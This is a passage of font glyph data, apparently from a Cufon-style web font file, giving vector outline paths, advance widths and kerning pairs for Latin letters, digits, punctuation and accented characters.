":"400,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":500},{"d":"197,-312r-74,0r0,-74r74,0r0,74xm197,0r-74,0r0,-74r74,0r0,74","w":292},{"d":"371,-564v124,-1,215,80,215,205v0,125,-91,205,-215,205r-207,0r0,154r-54,0r0,-712r54,0r0,148r207,0xm365,-202v101,0,167,-54,167,-157v0,-103,-66,-157,-167,-157r-201,0r0,314r201,0","w":646},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm198,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"w":255},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm381,-737r-106,147r-58,0r97,-147r67,0","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"321,0r-70,70r0,-140r70,0r0,70xm165,0r-70,70r0,-140r70,0r0,70","w":416,"k":{"Y":110,"W":50,"V":80,"T":110}},{"w":243},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm426,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":559},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196xm391,-780r-58,0r-106,-147r67,0","w":687},{"w":487},{"d":"148,-85v4,80,17,91,69,144r-35,35v-59,-62,-85,-77,-85,-173r0,-554v4,-95,26,-111,85,-173r35,35v-52,54,-69,63,-69,144r0,542","w":284},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm323,-590r-58,0r-106,-147r67,0","w":559},{"d":"467,-366v72,22,121,83,122,172v1,125,-83,195,-209,194r-270,0r0,-712r262,0v117,-1,206,70,206,186v0,79,-48,141,-111,160xm366,-388v92,0,158,-44,158,-138v0,-94,-66,-138,-158,-138r-202,0r0,276r202,0xm374,-48v94,1,161,-54,161,-146v0,-92,-67,-146,-161,-146r-210,0r0,292r210,0","w":671,"k":{"J":30}},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144xm409,-600r-58,0r0,-77r58,0r0,77xm201,-600r-58,0r0,-77r58,0r0,77","w":559},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48xm447,-790r-58,0r0,-77r58,0r0,77xm239,-790r-58,0r0,-77r58,0r0,77","w":598},{"d":"148,0r-51,0r0,-482r51,0r0,482xm261,-737r-106,147r-58,0r97,-147r67,0","w":245},{"d":"308,70r-64,150r-63,0r72,-150r55,0","w":500},{"d":"245,74r-148,0r0,-860r148,0r0,45r-97,0r0,770r97,0r0,45","w":290},{"d":"69,-241v0,-152,61,-247,194,-247v40,0,75,10,105,30r40,-68r48,0r-56,94v38,41,57,104,57,191v0,152,-61,247,-194,247v-39,0,-74,-10,-105,-29r-40,67r-48,0r56,-94v-38,-41,-57,-104,-57,-191xm263,-39v103,0,143,-72,143,-202v0,-69,-11,-119,-32,-148r-192,325v24,17,51,25,81,25xm263,-443v-103,0,-143,72,-143,202v0,69,11,119,32,148r192,-325v-24,-17,-51,-25,-81,-25","w":526},{"d":"313,0r-51,0r0,-654r-129,114r0,-61r129,-111r51,0r0,712"},{"d":"290,-488v109,-1,178,70,178,180r0,308r-51,0r0,-299v1,-90,-45,-144,-133,-144v-86,0,-137,56,-136,144r0,299r-51,0r0,-482r51,0r0,57v36,-42,83,-63,142,-63xm219,-694v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":559},{"d":"283,-671v-75,0,-123,38,-122,113v0,55,30,90,91,107v72,20,143,33,181,89v23,34,36,72,36,115v1,84,-51,143,-110,170v58,19,103,72,103,146v0,98,-78,167,-179,167v-100,0,-179,-60,-184,-155r54,0v7,71,50,107,130,107v106,0,160,-113,99,-189v-32,-41,-95,-49,-151,-65v-77,-22,-133,-88,-134,-181v-1,-84,51,-143,110,-170v-66,-29,-99,-76,-99,-141v0,-147,194,-207,298,-120v34,27,52,64,55,111r-53,0v-7,-69,-48,-104,-125,-104xm283,-105v78,0,132,-60,132,-142v0,-86,-58,-141,-132,-142v-78,-1,-132,60,-132,142v0,83,54,142,132,142","w":566},{"d":"148,-418v41,-75,193,-98,257,-24r-37,37v-27,-26,-43,-37,-91,-38v-80,-2,-130,67,-129,146r0,297r-51,0r0,-482r51,0r0,64","w":409,"k":{"\u0153":35,"\u00f8":35,"\u00f6":35,"\u00f5":35,"\u00f4":35,"\u00f3":35,"\u00f2":35,"\u00eb":35,"\u00ea":35,"\u00e9":35,"\u00e8":35,"\u00e7":35,"\u00e6":35,"s":10,"q":35,"o":35,"g":35,"e":35,"d":35,"c":35,"a":10,".":120}},{"d":"344,-240r-262,0r0,-47r262,0r0,47","w":426},{"w":975},{"d":"281,-39v65,0,87,-22,124,-61r35,32v-46,49,-77,73,-159,74v-136,1,-212,-103,-212,-247v0,-176,132,-292,297,-231v24,9,49,30,74,58r-35,32v-37,-39,-59,-61,-124,-61v-107,0,-161,79,-161,202v0,123,53,202,161,202","w":493,"k":{"\u0153":15,"\u00f6":15,"\u00f5":15,"\u00f4":15,"\u00f3":15,"\u00f2":15,"\u00eb":15,"\u00ea":15,"\u00e9":15,"\u00e8":15,"\u00e6":15,"\u00e5":15,"\u00e4":15,"\u00e3":15,"\u00e2":15,"\u00e1":15,"\u00e0":15,"w":20,"o":15,"e":15,"d":10,"c":15,"a":15}},{"d":"238,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66","w":320},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm399,-590r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":524},{"d":"822,-712r-178,712r-55,0r-168,-620r-168,620r-55,0r-178,-712r57,0r150,619r166,-619r56,0r166,619r150,-619r57,0","w":842,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"s":40,"q":40,"o":40,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":10,".":50}},{"d":"273,-497v87,0,163,75,163,163v0,88,-76,163,-163,163v-87,0,-163,-75,-163,-163v0,-88,76,-163,163,-163","w":546},{"d":"484,-712r-210,417r0,295r-54,0r0,-295r-210,-417r58,0r181,360r177,-360r58,0xm380,-790r-58,0r0,-77r58,0r0,77xm172,-790r-58,0r0,-77r58,0r0,77","w":494},{"w":162},{"d":"171,-415r-67,0r0,-67r67,0r0,67xm165,230r-55,0r3,-520r49,0","w":304},{"d":"263,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202xm396,-600r-58,0r0,-77r58,0r0,77xm188,-600r-58,0r0,-77r58,0r0,77","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"229,-719v84,0,157,73,157,157v0,84,-73,157,-157,157v-84,0,-157,-73,-157,-157v0,-84,73,-157,157,-157xm229,-447v63,0,112,-52,112,-115v0,-63,-50,-115,-113,-115v-64,0,-111,51,-111,115v0,63,49,115,112,115","w":458},{"d":"588,-437r-100,0r-25,153r96,0r0,44r-103,0r-38,240r-51,0r39,-240r-176,0r-37,240r-51,0r38,-240r-96,0r0,-44r103,0r25,-153r-99,0r0,-45r105,0r36,-230r52,0r-37,230r175,0r36,-230r50,0r-36,230r94,0r0,45xm437,-437r-175,0r-25,153r175,0","w":639},{"d":"197,-312r-74,0r0,-74r74,0r0,74xm193,68r-68,68r0,-204r68,0r0,136","w":292},{"d":"542,0r-432,0r0,-712r432,0r0,48r-378,0r0,281r322,0r0,48r-322,0r0,287r378,0r0,48","w":598,"k":{"J":10}},{"d":"281,-39v65,0,87,-22,124,-61r35,32v-46,49,-77,73,-159,74v-136,1,-212,-103,-212,-247v0,-176,132,-292,297,-231v24,9,49,30,74,58r-35,32v-37,-39,-59,-61,-124,-61v-107,0,-161,79,-161,202v0,123,53,202,161,202xm308,70r-64,150r-63,0r72,-150r55,0","w":498,"k":{"\u0153":15,"\u00e6":15,"o":15,"e":15,"c":15,"a":15}},{"d":"186,-42v105,0,159,-70,158,-179r0,-491r54,0r0,502v2,128,-85,218,-212,216v-63,0,-115,-20,-156,-61r37,-37v33,32,57,50,119,50","w":498,"k":{"A":10}},{"d":"297,-590r-58,0r-106,-147r67,0","w":500},{"d":"627,0r-64,0r-229,-399r-170,206r0,193r-54,0r0,-712r54,0r0,445r361,-445r65,0r-220,272","w":645,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":30,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141xm373,-780r-58,0r-106,-147r67,0","w":652,"k":{"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"708,0r-54,0r0,-587r-216,487r-54,0r-220,-487r0,587r-54,0r0,-712r54,0r248,549r242,-549r54,0r0,712","w":818},{"d":"193,74r-148,0r0,-42r100,0r0,-776r-100,0r0,-42r148,0r0,860","w":290},{"d":"148,0r-51,0r0,-482r51,0r0,482xm363,-600r-58,0r0,-77r58,0r0,77xm155,-600r-58,0r0,-77r58,0r0,77","w":245},{"d":"459,-667r-252,667r-52,0r252,-667r-270,0r0,112r-51,0r0,-157r373,0r0,45"},{"d":"326,-42v103,-1,171,-70,189,-160r53,0v-19,119,-110,206,-242,208v-108,2,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-174,234,-172v133,2,223,88,242,208r-55,0v-18,-91,-84,-159,-187,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,142,180,141","w":644,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"297,-590r-58,0r-106,-147r67,0xm327,-488v132,0,194,96,194,247v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247v0,-152,61,-247,194,-247xm327,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"560,-546v13,59,12,321,0,380v-20,95,-126,172,-234,172v-108,0,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-172,234,-172v108,0,214,77,234,172xm506,-183v11,-54,11,-292,0,-346v-16,-80,-92,-141,-180,-141v-88,0,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141v88,0,164,-61,180,-141","w":652,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"443,-109r-31,31r-155,-155r-155,155r-31,-31r155,-155r-155,-155r31,-31r155,155r155,-155r31,31r-155,155"},{"d":"496,0r-433,0r0,-57r375,-607r-360,0r0,-48r418,0r0,48r-378,616r378,0r0,48","w":559},{"d":"527,-164v34,-54,41,-88,42,-177r53,0v0,94,-21,166,-62,217r102,124r-69,0r-69,-84v-62,60,-135,90,-219,90v-151,0,-265,-125,-209,-276v27,-74,85,-104,151,-148v-38,-46,-75,-84,-79,-158v-4,-78,66,-142,145,-142v79,0,145,65,145,143v0,69,-78,129,-135,164xm313,-670v-72,0,-115,81,-77,146v10,18,29,44,56,77v45,-35,110,-57,113,-128v1,-52,-41,-95,-92,-95xm138,-200v-6,93,71,158,166,158v67,0,131,-26,190,-79r-216,-261v-85,61,-134,82,-140,182","w":746},{"d":"326,-42v111,0,195,-86,191,-210r0,-64r-191,0r0,-48r245,0r0,116v17,234,-278,333,-423,181v-72,-76,-66,-126,-66,-289v0,-163,-5,-212,66,-289v84,-91,245,-98,338,-16v44,38,72,88,83,151r-54,0v-18,-91,-86,-159,-189,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,141,180,141","w":651,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"154,-649r-63,0r0,-63r63,0r0,63xm148,0r-51,0r0,-482r51,0r0,482","w":245},{"d":"344,-42v114,0,190,-81,190,-196r0,-474r54,0r0,481v2,137,-105,237,-244,237v-139,0,-244,-100,-244,-237r0,-481r54,0r0,474v-2,115,76,196,190,196","w":688,"k":{"J":40}},{"d":"326,-670v-105,0,-159,70,-158,179r0,111r158,0r0,38r-158,0r0,294r314,0r0,48r-368,0r0,-342r-64,0r0,-38r64,0r0,-122v-2,-128,85,-218,212,-216v63,0,115,20,156,61r-37,37v-33,-32,-57,-50,-119,-50","w":537},{"d":"184,-436r-51,0r0,-350r51,0r0,350xm184,74r-51,0r0,-350r51,0r0,350","w":328},{"d":"383,-600r-58,0r0,-77r58,0r0,77xm175,-600r-58,0r0,-77r58,0r0,77","w":500},{"d":"338,74r-53,0r-285,-860r53,0","w":338},{"d":"112,-586v0,-91,58,-138,160,-126r0,45v-68,-5,-109,12,-109,80r0,105r109,0r0,38r-109,0r0,444r-51,0r0,-444r-66,0r0,-38r66,0r0,-104","w":304,"k":{"\u201d":-20,"\u201c":-20,"\u2019":-20,"\u2018":-20,"\u0153":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20,"a":20,".":50,"*":-20}},{"w":325},{"d":"158,-556r-63,0r0,-156r63,0r0,156","w":253},{"d":"275,-39v86,0,137,-56,136,-144r0,-299r51,0r0,482r-51,0r0,-57v-36,42,-83,63,-142,63v-109,1,-178,-70,-178,-180r0,-308r51,0r0,299v-1,90,45,144,133,144","w":559},{"w":121},{"d":"791,-240r-709,0r0,-47r709,0r0,47","w":873},{"d":"572,-54r-32,32r-75,-74v-75,64,-199,64,-274,0r-74,74r-32,-32r74,-74v-64,-75,-64,-200,0,-275r-74,-73r32,-32r74,73v74,-63,200,-63,274,0r75,-73r32,32r-74,73v62,74,63,201,0,275xm328,-96v91,0,169,-77,169,-169v0,-92,-78,-169,-169,-169v-91,0,-169,77,-169,169v0,92,78,169,169,169","w":657},{"d":"589,0r-54,0r0,-335r-371,0r0,335r-54,0r0,-712r54,0r0,329r371,0r0,-329r54,0r0,712","w":699},{"d":"628,-368v76,0,131,57,131,134r0,107v1,77,-55,134,-131,134v-76,0,-132,-57,-132,-134r0,-107v-1,-77,56,-134,132,-134xm603,-712r-332,712r-45,0r332,-712r45,0xm201,-719v76,0,131,57,131,134r0,107v1,77,-55,133,-131,133v-76,0,-132,-56,-132,-133r0,-107v-1,-77,56,-134,132,-134xm715,-129r0,-103v0,-65,-29,-98,-87,-98v-59,0,-88,33,-88,98r0,103v0,65,29,98,88,98v58,0,87,-33,87,-98xm288,-480r0,-103v0,-65,-29,-98,-87,-98v-59,0,-88,33,-88,98r0,103v0,65,29,97,88,97v58,0,87,-32,87,-97","w":828},{"d":"278,-265r-196,196r0,-66r130,-130r-130,-130r0,-66","w":320},{"d":"753,-285r-44,0r0,-328r-110,218r-46,0r-110,-218r0,328r-44,0r0,-427r44,0r133,270r133,-270r44,0r0,427xm320,-671r-122,0r0,386r-44,0r0,-386r-122,0r0,-41r288,0r0,41","w":809},{"d":"74,-414v39,-53,83,-73,170,-74v125,0,187,53,187,158r0,330r-51,0r0,-48v-40,39,-72,53,-147,54v-110,1,-177,-41,-177,-138v0,-93,70,-139,168,-139r156,0v8,-113,-23,-175,-136,-172v-72,2,-102,18,-133,61xm233,-39v96,0,148,-27,147,-129r0,-62r-150,0v-82,0,-123,32,-123,97v0,71,48,94,126,94xm382,-600r-58,0r0,-77r58,0r0,77xm174,-600r-58,0r0,-77r58,0r0,77","w":524},{"d":"187,-457v-1,55,26,83,79,79r0,44v-53,-4,-80,24,-79,79r0,207v1,100,-37,123,-137,122r0,-45v69,1,86,-7,86,-78r0,-207v1,-56,21,-80,61,-100v-40,-21,-60,-44,-61,-100r0,-207v1,-71,-16,-79,-86,-78r0,-45v99,-1,137,22,137,122r0,207","w":316},{"d":"165,-642r-70,70r0,-140r70,0r0,70","w":260,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm301,-975v61,0,114,53,114,114v0,61,-53,115,-114,115v-61,0,-114,-54,-114,-115v0,-61,53,-114,114,-114xm301,-788v39,0,73,-34,73,-73v0,-39,-34,-72,-73,-72v-39,0,-73,33,-73,72v0,39,34,73,73,73","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"w":255},{"d":"292,-164v56,-5,80,-24,113,-61r35,32v-43,47,-73,69,-148,74r0,119r-43,0r0,-121v-115,-15,-180,-111,-180,-245v0,-134,65,-230,180,-245r0,-101r43,0r0,99v75,5,105,27,148,74r-35,32v-33,-37,-57,-56,-113,-61r0,404xm249,-565v-87,17,-129,86,-129,199v0,113,42,182,129,199r0,-398","w":498},{"d":"244,-719v111,0,189,78,189,189v0,79,-34,133,-101,162v77,26,115,85,115,178v0,120,-85,198,-202,197v-118,0,-199,-65,-203,-180r51,0v4,86,67,134,152,135v87,1,151,-62,151,-152v0,-106,-56,-155,-167,-152r0,-45v102,3,153,-43,153,-143v0,-86,-56,-144,-138,-144v-85,0,-134,52,-142,130r-51,0v7,-104,85,-175,193,-175"},{"d":"313,-556r-63,0r0,-156r63,0r0,156xm158,-556r-63,0r0,-156r63,0r0,156","w":408},{"d":"146,-126v-4,70,38,86,109,81r0,45v-102,10,-160,-31,-160,-125r0,-587r51,0r0,586","w":287,"k":{"\u201d":60,"\u201c":60,"\u2019":60,"\u2018":60,"y":20,"w":20,"v":40,"o":20,"e":25,"c":25,"*":60}},{"d":"259,-718v99,0,181,78,179,176v-3,91,-86,177,-129,244v-18,29,-18,63,-18,107r-51,0v-2,-59,3,-94,29,-135v39,-62,113,-134,118,-216v4,-72,-56,-131,-128,-131v-74,0,-129,60,-128,131r-51,0v-2,-97,79,-176,179,-176xm299,0r-67,0r0,-67r67,0r0,67","w":488},{"d":"164,0r-54,0r0,-712r54,0r0,712xm274,-927r-106,147r-58,0r97,-147r67,0","w":274},{"d":"596,-431v109,0,149,121,84,203r-149,188r183,0r0,40r-236,0r0,-40r168,-213v44,-49,23,-141,-50,-138v-45,2,-75,27,-74,76r-44,0v-1,-68,48,-116,118,-116xm530,-712r-332,712r-45,0r332,-712r45,0xm169,-285r-44,0r0,-378r-80,71r0,-51r80,-69r44,0r0,427","w":764},{"d":"261,-718v112,0,190,75,188,187v0,49,-16,94,-49,137r-267,349r316,0r0,45r-377,0r0,-45r286,-375v79,-90,37,-259,-97,-253v-83,4,-139,52,-137,142r-51,0v-1,-110,76,-187,188,-187"},{"d":"423,-712v119,-1,197,84,197,205r0,507r-51,0r0,-59v-32,44,-78,66,-139,66v-130,0,-182,-95,-182,-248v0,-158,45,-248,181,-248v59,0,105,23,140,68r0,-89v1,-100,-58,-161,-155,-161r-132,0v-96,4,-154,54,-154,161r0,353v1,76,15,93,62,129r-35,35v-60,-43,-78,-67,-78,-164r0,-350v-1,-120,75,-205,196,-205r150,0xm434,-38v113,0,135,-90,135,-203v0,-113,-22,-203,-135,-203v-113,0,-135,90,-135,203v0,113,22,203,135,203","w":697},{"d":"181,-383v136,-59,267,39,267,182v0,115,-72,207,-188,207v-178,0,-225,-195,-149,-349r183,-369r51,0xm259,-39v86,0,138,-69,138,-158v0,-86,-51,-158,-138,-158v-87,0,-137,68,-137,158v0,91,50,158,137,158"},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0","w":602,"k":{"\u201d":80,"\u201c":80,"\u2019":80,"\u2018":80,"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"J":-15,"G":10,"C":10}},{"d":"273,-468v133,0,174,91,178,235v4,148,-57,239,-192,240v-114,1,-176,-60,-185,-164r51,0v11,79,55,119,134,119v106,0,141,-80,141,-195v0,-108,-26,-190,-133,-190v-64,0,-115,27,-129,75r-45,0r0,-364r342,0r0,45r-297,0r0,252v31,-35,76,-53,135,-53"},{"d":"257,-718v106,0,188,81,188,186v0,73,-32,127,-97,162v75,39,112,99,112,178v0,112,-90,198,-203,198v-113,0,-203,-86,-203,-198v0,-79,38,-138,113,-178v-65,-35,-98,-89,-98,-162v0,-105,82,-186,188,-186xm257,-391v80,0,137,-60,137,-141v0,-81,-57,-141,-137,-141v-80,0,-137,60,-137,141v0,81,57,141,137,141xm257,-39v85,0,152,-68,152,-153v0,-84,-68,-154,-152,-154v-84,0,-152,70,-152,154v0,85,67,153,152,153"},{"d":"254,-718v178,0,225,195,149,349r-183,369r-51,0r164,-329v-24,11,-52,17,-84,17v-113,2,-183,-87,-183,-199v0,-115,72,-207,188,-207xm254,-357v87,0,138,-68,138,-158v0,-90,-52,-158,-138,-158v-87,0,-137,68,-137,158v0,86,50,158,137,158"},{"d":"262,-488v135,0,201,109,193,258r-335,0v-1,115,49,190,157,190v66,0,95,-22,133,-58r38,30v-49,47,-87,74,-174,74v-142,0,-205,-96,-205,-247v0,-142,62,-247,193,-247xm404,-271v9,-130,-109,-214,-217,-150v-47,28,-64,77,-67,150r284,0xm397,-600r-58,0r0,-77r58,0r0,77xm189,-600r-58,0r0,-77r58,0r0,77","w":523,"k":{"y":10,"x":20,"w":5,"v":10}},{"d":"542,-664r-378,0r0,293r322,0r0,48r-322,0r0,323r-54,0r0,-712r432,0r0,48","w":576,"k":{"\u0153":40,"\u0152":20,"\u00f8":40,"\u00e6":40,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"z":30,"x":30,"u":30,"r":30,"p":30,"o":40,"n":30,"m":30,"e":40,"c":40,"a":40,"S":10,"Q":20,"O":20,"J":140,"G":20,"C":20,"A":60,".":100}},{"d":"184,74r-51,0r0,-860r51,0r0,860","w":317},{"d":"445,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66xm238,-69r-196,-196r196,-196r0,66r-130,130r130,130r0,66","w":527},{"d":"226,-715v105,0,154,77,154,196v0,120,-49,196,-154,196v-105,0,-154,-77,-154,-196v0,-120,49,-196,154,-196xm226,-362v80,0,111,-55,111,-157v0,-102,-30,-157,-111,-157v-80,0,-111,55,-111,157v0,102,30,157,111,157","w":452},{"d":"416,-482r-224,613v-21,66,-63,90,-148,87r0,-45v119,15,109,-101,146,-173r-176,-482r56,0r145,422r145,-422r56,0xm348,-600r-58,0r0,-77r58,0r0,77xm140,-600r-58,0r0,-77r58,0r0,77","w":430},{"w":243},{"d":"326,-42v103,-1,171,-70,189,-160r53,0v-19,119,-110,206,-242,208v-108,2,-214,-77,-234,-172v-13,-59,-12,-321,0,-380v20,-95,126,-174,234,-172v133,2,223,88,242,208r-55,0v-18,-91,-84,-159,-187,-160v-88,-1,-164,61,-180,141v-11,54,-11,292,0,346v16,80,92,142,180,141xm366,70r-64,150r-63,0r72,-150r55,0","w":644,"k":{"\u00c6":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":40,"A":10}},{"d":"69,-241v0,-152,61,-247,194,-247v31,0,56,6,75,17r-67,-113r-117,0r0,-38r95,0r-53,-90r53,0r52,90r79,0r0,38r-57,0v54,108,134,185,134,343v0,152,-61,247,-194,247v-132,0,-194,-96,-194,-247xm263,-39v103,0,143,-72,143,-202v0,-131,-39,-202,-143,-202v-103,0,-143,72,-143,202v0,131,39,202,143,202","w":526},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-62r51,0r0,712r-51,0r0,-292v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"629,0r-54,0r-411,-619r0,619r-54,0r0,-712r54,0r411,617r0,-617r54,0r0,712xm305,-884v35,0,92,47,125,45v17,0,37,-11,59,-33r30,29v-32,32,-62,48,-89,48v-31,0,-96,-45,-125,-45v-17,0,-37,11,-59,33r-30,-29v32,-32,62,-48,89,-48","w":739},{"d":"379,-403v-70,-58,-258,-67,-258,52v0,128,212,57,281,121v22,21,36,50,36,93v2,175,-297,177,-388,74r35,-35v37,39,90,59,158,59v97,0,145,-33,145,-98v0,-85,-93,-81,-172,-88v-97,-8,-145,-50,-145,-126v0,-157,245,-169,342,-86","w":494,"k":{"\u2019":60,"v":10,"t":10,"s":20}},{"d":"483,-712r-163,326r108,0r0,38r-127,0r-27,53r0,53r154,0r0,38r-154,0r0,204r-54,0r0,-204r-155,0r0,-38r155,0r0,-53r-27,-53r-128,0r0,-38r109,0r-164,-326r57,0r181,361r179,-361r56,0","w":493},{"d":"587,0r-58,0r-62,-173r-332,0r-62,173r-58,0r262,-712r48,0xm450,-221r-149,-419r-149,419r298,0xm451,-780r-57,0r-93,-109r-93,109r-57,0r123,-147r54,0","w":602,"k":{"\u0152":10,"y":15,"v":15,"Y":35,"W":10,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"447,-718v195,0,362,167,362,362v0,195,-167,362,-362,362v-195,0,-362,-167,-362,-362v0,-195,167,-362,362,-362xm447,-38v167,0,314,-151,314,-318v0,-167,-147,-318,-314,-318v-167,0,-314,151,-314,318v0,167,147,318,314,318xm451,-522v-96,-1,-131,71,-132,166v0,110,44,165,132,165v37,0,70,-14,101,-41r30,30v-39,35,-82,52,-131,52v-117,2,-177,-90,-177,-206v0,-142,103,-245,246,-195v19,7,40,22,62,41r-30,30v-31,-28,-65,-42,-101,-42","w":894},{"d":"69,-241v0,-149,42,-247,180,-247v61,0,109,23,143,68r0,-292r51,0r0,712r-51,0r0,-62v-34,45,-82,68,-143,68v-138,0,-180,-98,-180,-247xm256,-39v112,0,136,-90,136,-202v0,-113,-24,-202,-136,-202v-112,0,-136,90,-136,202v0,113,24,202,136,202","w":540},{"d":"766,-67r-52,0r0,67r-44,0r0,-67r-170,0r0,-40r154,-320r47,0r-153,320r122,0r0,-120r44,0r0,120r52,0r0,40xm605,-712r-332,712r-45,0r332,-712r45,0xm176,-716v69,0,119,47,118,116v0,47,-19,78,-57,95v43,16,65,50,65,103v0,113,-136,156,-214,93v-24,-19,-37,-48,-38,-85r45,0v1,47,35,74,82,74v47,0,81,-33,81,-82v0,-57,-31,-83,-92,-81r0,-39v56,2,84,-23,84,-77v0,-47,-30,-77,-74,-77v-45,0,-73,28,-76,70r-44,0v4,-65,52,-110,120,-110","w":806},{"d":"194,-712r-3,520r-49,0r-3,-520r55,0xm200,0r-67,0r0,-67r67,0r0,67","w":304},{"d":"398,-608r-296,0r0,-46r296,0r0,46","w":500},{"d":"168,-716v109,0,149,121,84,203r-149,188r183,0r0,40r-236,0r0,-40r168,-213v44,-49,23,-141,-50,-138v-45,2,-75,27,-74,76r-44,0v-1,-69,48,-116,118,-116","w":336},{"d":"845,0r-431,0r0,-173r-255,0r-90,173r-59,0r377,-712r458,0r0,48r-378,0r0,284r322,0r0,48r-322,0r0,284r378,0r0,48xm